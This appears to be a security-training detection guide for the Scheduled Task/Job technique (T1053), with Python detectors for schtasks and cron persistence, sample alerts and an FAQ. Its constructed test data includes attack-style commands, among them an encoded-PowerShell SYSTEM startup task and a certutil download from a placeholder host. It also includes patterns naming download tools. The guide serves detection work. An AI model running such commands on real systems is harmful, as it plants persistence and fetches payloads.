T1053 | Execution | Medium difficulty

Scheduled Task/Job

Scheduled Task/Job (T1053) is a MITRE ATT&CK technique in the Execution tactic. SOC analysts detect it by monitoring XDR and SIEM events for behavioral anomalies and the specific indicators described in this detection guide. Practice detection in SOCSimulator Operations.

Detection tools: XDR, SIEM

What is Scheduled Task/Job?

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication credentials are used to authenticate to the remote system. An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote execution as part of lateral movement, or to run a process under the context of a specified account. On Windows, schtasks.exe and the Task Scheduler service provide scheduling capabilities. On Unix-based systems, cron, at, and launchd serve similar purposes. Scheduled tasks are attractive to attackers because they survive reboots, run with elevated privileges depending on configuration, and blend in with legitimate administrative task scheduling.

Scheduled Task/Job is documented as technique T1053 in the MITRE ATT&CK knowledge base under the Execution tactic. Detection requires visibility into XDR and SIEM telemetry.

Detection Strategies

The following detection strategies help SOC analysts identify Scheduled Task/Job activity. These methods apply across XDR and SIEM environments and can be implemented as detection rules, correlation queries, or behavioral analytics in your security platform.

1. Monitor schtasks.exe and at.exe process creation events, particularly those creating tasks that run at system startup, execute from unusual paths, or use obfuscated command line arguments including encoded PowerShell.

2. Audit the Windows Task Scheduler registry keys and XML task definitions for recently created or modified tasks, focusing on tasks using SYSTEM or Administrator accounts and tasks pointing to executable paths in user-writable locations.

3. Monitor cron file modifications on Linux systems using file integrity monitoring, alerting on changes to /etc/crontab, /etc/cron.d/, user crontabs, and /etc/rc.local, which are commonly abused for persistence.

4. Correlate scheduled task creation events with user authentication events to identify tasks created immediately after suspicious logins or during known attack timeframes identified through incident response.

5. Alert on scheduled tasks executing PowerShell or cmd.exe with encoded arguments, or tasks that download content from the internet using certutil, bitsadmin, or curl, as these patterns indicate malicious use.
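The Windows-side strategies above (1, 2, 4 and 5) can be expressed as a small rule set over process-creation and logon telemetry. The following is an added example written for this guide, not code from SOCSimulator or from any security product: it takes constructed Sysmon-style process-creation events and Windows logon events (field names are an assumption), extracts the program a schtasks.exe /create command will run, decodes any -EncodedCommand payload for analyst review, flags startup/SYSTEM tasks, user-writable paths and download utilities, and correlates each creation with a recent network or RDP logon by the same account.

```python
import base64
import re
import shlex
from datetime import datetime, timedelta

# Constructed sample: base64 of a harmless UTF-16LE PowerShell string, generated here so
# the encoded-command rule has a realistic payload to decode.
SAMPLE_ENCODED = base64.b64encode("Write-Host placeholder".encode("utf-16le")).decode()

# Constructed process-creation events in Sysmon Event ID 1 style (not real telemetry).
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:14:02", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\schtasks.exe",
     "command_line": 'schtasks.exe /create /tn "WindowsUpdateHelper" /sc onstart /ru SYSTEM '
                     '/tr "powershell.exe -NoP -W Hidden -enc ' + SAMPLE_ENCODED + '"'},
    {"time": "2024-05-01T09:30:45", "user": "CORP\\backupsvc",
     "image": "C:\\Windows\\System32\\schtasks.exe",
     "command_line": 'schtasks.exe /create /tn "NightlyBackup" /sc daily /st 02:00 '
                     '/tr "C:\\Program Files\\Backup\\backup.exe --full"'},
    {"time": "2024-05-01T11:02:10", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\schtasks.exe",
     "command_line": 'schtasks.exe /create /tn "Updater" /sc minute /mo 10 '
                     '/tr "cmd.exe /c certutil -urlcache -f http://example.invalid/a C:\\Users\\Public\\a.exe"'},
]

# Constructed logon events (Windows Event ID 4624 style) for the correlation step.
SAMPLE_LOGONS = [
    {"time": "2024-05-01T09:12:40", "user": "CORP\\jdoe", "logon_type": 10, "source_ip": "203.0.113.25"},
    {"time": "2024-05-01T07:55:00", "user": "CORP\\backupsvc", "logon_type": 4, "source_ip": "-"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
USER_WRITABLE = re.compile(r"\\(appdata|temp|programdata|users\\public|downloads)\\", re.I)
DOWNLOADERS = re.compile(r"\b(certutil|bitsadmin|curl)(\.exe)?\b", re.I)


def task_action(command_line):
    """Return the /tr argument (the program the task will run), or None if absent."""
    try:
        tokens = shlex.split(command_line, posix=False)  # keep Windows backslashes intact
    except ValueError:
        tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() == "/tr":
            return tokens[i + 1].strip('"')
    return None


def decode_encoded_command(text):
    """Decode a PowerShell -EncodedCommand payload (base64 over UTF-16LE) for analyst review."""
    m = ENCODED_FLAG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate_task_creation(event):
    """Strategies 1, 2 and 5: inspect a schtasks.exe/at.exe task creation for risky properties."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd, low = event["command_line"], event["command_line"].lower()
    if image not in ("schtasks.exe", "at.exe") or "/create" not in low:
        return None
    action = task_action(cmd) or ""
    decoded = decode_encoded_command(action)
    checks = [
        ("runs_at_startup_or_logon", re.search(r"/sc\s+on(start|logon)", low)),
        ("runs_as_system", re.search(r'/ru\s+"?(system|nt authority\\system)', low)),
        ("action_in_user_writable_path", USER_WRITABLE.search(action)),
        ("action_uses_download_utility", DOWNLOADERS.search(action)),
        ("encoded_powershell", decoded is not None),
    ]
    findings = [name for name, hit in checks if hit]
    return {"task": cmd, "user": event["user"], "findings": findings, "decoded": decoded}


def correlate_with_logons(task_event, logon_events, window=timedelta(minutes=5)):
    """Strategy 4: network (type 3) or RDP (type 10) logons by the same account shortly before creation."""
    created = datetime.fromisoformat(task_event["time"])
    hits = []
    for logon in logon_events:
        delta = created - datetime.fromisoformat(logon["time"])
        same_user = logon["user"].lower() == task_event["user"].lower()
        if same_user and logon["logon_type"] in (3, 10) and timedelta(0) <= delta <= window:
            hits.append(logon)
    return hits


def run(events=SAMPLE_EVENTS, logons=SAMPLE_LOGONS):
    """Evaluate every event and return alerts for task creations with at least one finding."""
    alerts = []
    for ev in events:
        result = evaluate_task_creation(ev)
        if not result or not result["findings"]:
            continue
        result["recent_logons"] = correlate_with_logons(ev, logons)
        result["severity"] = "high" if len(result["findings"]) >= 2 else "medium"
        alerts.append(result)
    return alerts


if __name__ == "__main__":
    for alert in run():
        print(alert["severity"], alert["user"], alert["findings"], alert["decoded"])
```

On the constructed sample the nightly backup task produces no alert, the startup task running as SYSTEM with an encoded command is rated high and carries both the decoded payload and the RDP logon 82 seconds before it, and the task launching certutil from a user-writable path is rated high with no matching logon. The decoded payload is the piece an analyst wants in the alert body, since the base64 alone says nothing about what the task does.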

Example Alerts

These realistic alert examples show what Scheduled Task/Job looks like in your security tools. Use them to tune detection rules and train analysts to recognize true positives versus false positives in live environments.

Severity: High | Source: SIEM

Suspicious Scheduled Task Created for Persistence

New scheduled task created via schtasks.exe named "WindowsUpdateHelper" configured to run at system startup. The task executes PowerShell with an encoded command from a file in %AppData%\Local\Temp. This naming convention and execution pattern are consistent with persistence mechanisms used by multiple commodity malware families.

Severity: High | Source: XDR

Scheduled Task Running Encoded PowerShell

Scheduled task fired and executed powershell.exe with -EncodedCommand flag. Decoded payload retrieves a remote script from a CDN domain and executes it in memory without writing to disk. The task was created 6 days ago by an account that has not logged in since, suggesting it was created during a previous compromise that was partially remediated.

Severity: Critical | Source: SIEM

Cron Job Added for Backdoor Persistence on Linux Server

File integrity monitoring detected a modification to /etc/cron.d/ on a production web server. The new cron entry executes a bash script from /tmp/.hidden every 5 minutes. The script establishes a reverse shell connection to an external IP address. The modification timestamp matches a period of unusual SSH authentication activity from an Asian IP address block.
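Detection strategy 3 and the Linux alert above both come down to reading cron files after a file integrity monitor reports a change and deciding which entries deserve an analyst's attention. The following is an added example for this guide, not SOCSimulator code: it parses both system-format cron files (/etc/crontab and /etc/cron.d/, which carry a user column) and per-user crontabs, handles @reboot-style shortcuts and environment lines, and flags commands in world-writable directories, hidden path components, very frequent schedules, IP literals and root execution. The sample cron contents are constructed.

```python
import re

# Constructed sample /etc/cron.d file (system format: schedule, user, command); not from a real host.
SAMPLE_CRON_D = """\
# constructed sample, not taken from a real host
SHELL=/bin/sh
*/5 * * * * root /tmp/.hidden/sync.sh
0 3 * * * root /usr/bin/apt-get update -q
*/1 * * * * www-data /dev/shm/.x/agent 203.0.113.40
@reboot root /usr/local/bin/start-agent
"""

# Constructed per-user crontab (no user column), as listed by `crontab -l`.
SAMPLE_USER_CRONTAB = "30 2 * * * /home/deploy/bin/rotate-logs.sh\n"

CRON_LINE = re.compile(r"^((?:\S+\s+){4}\S+)\s+(.*)$")  # five schedule fields, then the rest
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
HIDDEN_COMPONENT = re.compile(r"/\.[^/\s]+")  # a dot-prefixed directory or file in the path
IP_LITERAL = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_cron(text, system_format):
    """Parse crontab text into entries; system_format=True expects the user column (/etc/crontab, /etc/cron.d)."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or environment assignment such as SHELL=/bin/sh
        if line.startswith("@"):  # @reboot, @daily and similar shortcuts
            schedule, _, rest = line.partition(" ")
        else:
            m = CRON_LINE.match(line)
            if not m:
                continue
            schedule, rest = m.groups()
        if system_format:
            user, _, command = rest.partition(" ")
        else:
            user, command = None, rest
        entries.append({"schedule": schedule, "user": user, "command": command.strip()})
    return entries


def minute_interval(schedule):
    """Minutes between runs for simple every-N-minute schedules ("*/5 * * * *", "* * * * *"); None otherwise."""
    if schedule.startswith("@"):
        return None
    minute, hour = schedule.split()[:2]
    if hour != "*":
        return None
    if minute == "*":
        return 1
    m = re.fullmatch(r"\*/(\d+)", minute)
    return int(m.group(1)) if m else None


def assess(entry):
    """Return the suspicious properties of one cron entry (an empty list means nothing notable)."""
    cmd = entry["command"]
    findings = []
    if any(d in cmd for d in WORLD_WRITABLE):
        findings.append("command_in_world_writable_dir")
    if HIDDEN_COMPONENT.search(cmd):
        findings.append("hidden_path_component")
    interval = minute_interval(entry["schedule"])
    if interval is not None and interval <= 10:
        findings.append(f"runs_every_{interval}_min")
    if IP_LITERAL.search(cmd):
        findings.append("command_references_ip_literal")
    if entry["schedule"] == "@reboot":
        findings.append("runs_at_boot")
    if findings and entry["user"] == "root":
        findings.append("runs_as_root")  # escalates anything already flagged
    return findings


def scan(text, system_format):
    """Parse a cron file and return only the entries that have findings, with a severity attached."""
    results = []
    for entry in parse_cron(text, system_format):
        findings = assess(entry)
        if findings:
            entry["findings"] = findings
            entry["severity"] = "critical" if len(findings) >= 3 else "medium"
            results.append(entry)
    return results


if __name__ == "__main__":
    for hit in scan(SAMPLE_CRON_D, system_format=True):
        print(hit["severity"], hit["user"], hit["schedule"], hit["command"], hit["findings"])
```

Run against the sample, the apt-get entry and the user's log-rotation job are silent, the root job in /tmp/.hidden every five minutes is rated critical (the shape of the alert above), the www-data job in /dev/shm that references an IP literal is also critical, and the @reboot entry gets a medium rating so it is reviewed but does not page anyone on its own. In practice the scan runs on the post-change copy of the file that the integrity monitor reports, so the diff against the previous copy can be attached to the alert.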

Practice Detecting Scheduled Task/Job

SOCSimulator provides hands-on training rooms where you investigate real-world attack scenarios including Scheduled Task/Job. Build detection skills with zero consequences — free forever.


Frequently Asked Questions

How do SOC analysts detect Scheduled Task/Job?

SOC analysts detect Scheduled Task/Job (T1053) by monitoring XDR and SIEM telemetry for behavioral anomalies and specific indicators. Key detection methods include monitoring schtasks.exe and at.exe process creation events, particularly those creating tasks that run at system startup, execute from unusual paths, or use obfuscated command line arguments including encoded PowerShell. SOCSimulator provides hands-on practice detecting this technique with realistic alerts.

What security tools are used to detect Scheduled Task/Job?

Scheduled Task/Job can be detected using XDR and SIEM platforms. XDR tools are particularly effective for this technique because they provide visibility into the execution phase of the attack chain. SOCSimulator simulates all three tool types for hands-on training.

How common is Scheduled Task/Job in real-world attacks?

Scheduled Task/Job is a well-documented MITRE ATT&CK technique in the Execution tactic. It appears in threat intelligence reports from multiple security vendors and has been observed in campaigns by various threat actor groups. SOCSimulator includes realistic Scheduled Task/Job scenarios based on documented attack patterns, helping analysts build detection intuition.

Can I practice detecting Scheduled Task/Job for free?

Yes. SOCSimulator offers free forever access to training scenarios, including Execution techniques like Scheduled Task/Job. You can investigate realistic alerts in guided Operations rooms, build detection skills with SIEM, XDR, and Firewall interfaces, and test yourself under pressure in Shift Mode. No credit card required.